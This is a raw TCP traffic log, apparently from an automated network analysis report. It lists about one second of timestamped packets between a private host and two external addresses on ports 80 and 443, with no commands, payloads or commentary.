Nov 4, 2024 17:32:09.731981039 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.731991053 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.732048035 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.749711037 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.749735117 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.749746084 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.749818087 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.749984026 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.752744913 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.754617929 CET	49958	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.754640102 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.755155087 CET	49958	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.755160093 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.761159897 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.762837887 CET	49959	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.762849092 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.763276100 CET	49959	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.763282061 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.767400980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.767605066 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.767734051 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.768469095 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.768553019 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.768564939 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.768632889 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.768632889 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.812829971 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.812856913 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.812869072 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.812881947 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.812896013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.813108921 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.813108921 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.849255085 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849277973 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849304914 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849371910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849383116 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849396944 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849478960 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849497080 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.849497080 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.849497080 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.849617958 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.849906921 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849956989 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849968910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.849989891 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850037098 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.850037098 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.850236893 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850291967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850302935 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850352049 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850436926 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.850677967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850733042 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.850764036 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850786924 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850811005 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.850835085 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.850841999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850855112 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850867987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.850905895 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.850905895 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.870094061 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.870132923 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.870146990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.870373964 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.884251118 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.884305954 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.884501934 CET	49958	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.884677887 CET	49958	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.884691000 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.884701967 CET	49958	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.884707928 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.887871981 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.887897015 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.887907982 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.888192892 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.888192892 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.888221979 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.890152931 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.890378952 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.890392065 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.890428066 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.890500069 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.890610933 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.890716076 CET	49959	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.890716076 CET	49959	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.890739918 CET	49959	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.890749931 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.893282890 CET	49964	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.893333912 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.893429995 CET	49964	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.893599033 CET	49964	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.893614054 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.931723118 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.931747913 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.931772947 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.931780100 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.931860924 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.931871891 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.931883097 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.932020903 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.932060003 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.932193995 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.932208061 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.932271004 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.968803883 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.968827009 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.968837976 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.968916893 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.968929052 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969044924 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.969048023 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969062090 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969110012 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969120979 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969131947 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969254017 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.969284058 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.969460011 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969523907 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.969549894 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969587088 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969645977 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969656944 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969660997 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.969795942 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.969883919 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969947100 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.969952106 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969964027 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969976902 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.969986916 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.970015049 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.970052004 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.989840984 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.989901066 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.989912033 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.989924908 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.989959955 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.989960909 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.007003069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.007062912 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.007074118 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.007117033 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.007147074 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.007159948 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.007196903 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.007196903 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.051376104 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.051403999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.051417112 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.051474094 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.051479101 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.051486969 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.051543951 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.087959051 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.087985992 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.087996960 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088049889 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088063955 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088073015 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.088131905 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088170052 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.088170052 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.088298082 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088314056 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088325024 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088368893 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.088368893 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.088570118 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088644028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088659048 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088701963 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.088726997 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.088751078 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088764906 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.088804007 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.089549065 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089592934 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089601994 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.089605093 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089668989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.089728117 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089737892 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089749098 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089761019 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089777946 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.089792013 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.089832067 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.089864016 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089879036 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.089946985 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.089958906 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.090004921 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.108717918 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.108766079 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.108776093 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.108889103 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.109206915 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.109321117 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.126436949 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.126493931 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.126526117 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.126543999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.126564980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.126596928 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.126702070 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.171914101 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.171957016 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.171972990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.172008991 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.172008991 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.172013044 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.172027111 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.172032118 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.172070980 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.172070980 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207150936 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207170963 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207195997 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207215071 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207221031 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207223892 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207242966 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207317114 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207402945 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207429886 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207444906 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207494020 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207576036 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207843065 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207866907 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207881927 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207901955 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207915068 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207926989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.207969904 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207983017 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.207995892 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.208029985 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.208039999 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.208929062 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.208964109 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.208977938 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209007025 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.209007025 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.209028006 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.209052086 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209069967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209091902 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209110975 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.209141970 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.209141970 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.209307909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209319115 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209350109 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209357977 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.209362984 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209378958 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.209398985 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.209427118 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.215492964 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.216204882 CET	49960	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.216216087 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.216778040 CET	49960	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.216792107 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.223159075 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.223577023 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.223612070 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.224100113 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.224107027 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.225035906 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.225439072 CET	49962	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.225446939 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.225891113 CET	49962	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.225895882 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.228106022 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.228163958 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.228218079 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.228236914 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.228290081 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.245785952 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.245814085 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.245839119 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.245860100 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.245870113 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.245923996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.245995045 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.291048050 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.291076899 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.291090012 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.291150093 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.291182995 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.291201115 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.291225910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.291246891 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.291255951 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.291270018 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.291290045 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.326459885 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326476097 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326489925 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326543093 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326555014 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326571941 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.326620102 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.326819897 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326832056 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326843977 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326886892 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.326901913 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.326962948 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.326983929 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.327029943 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.327030897 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.327069998 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.327121973 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.327131033 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.327145100 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.327183008 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.327212095 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.327263117 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.327430010 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.327477932 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.327512980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.327523947 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.327568054 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.327568054 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.328411102 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328463078 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328475952 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328514099 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.328514099 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.328562021 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328573942 CET	80	49946	31.41.244.11	192.168.2.5
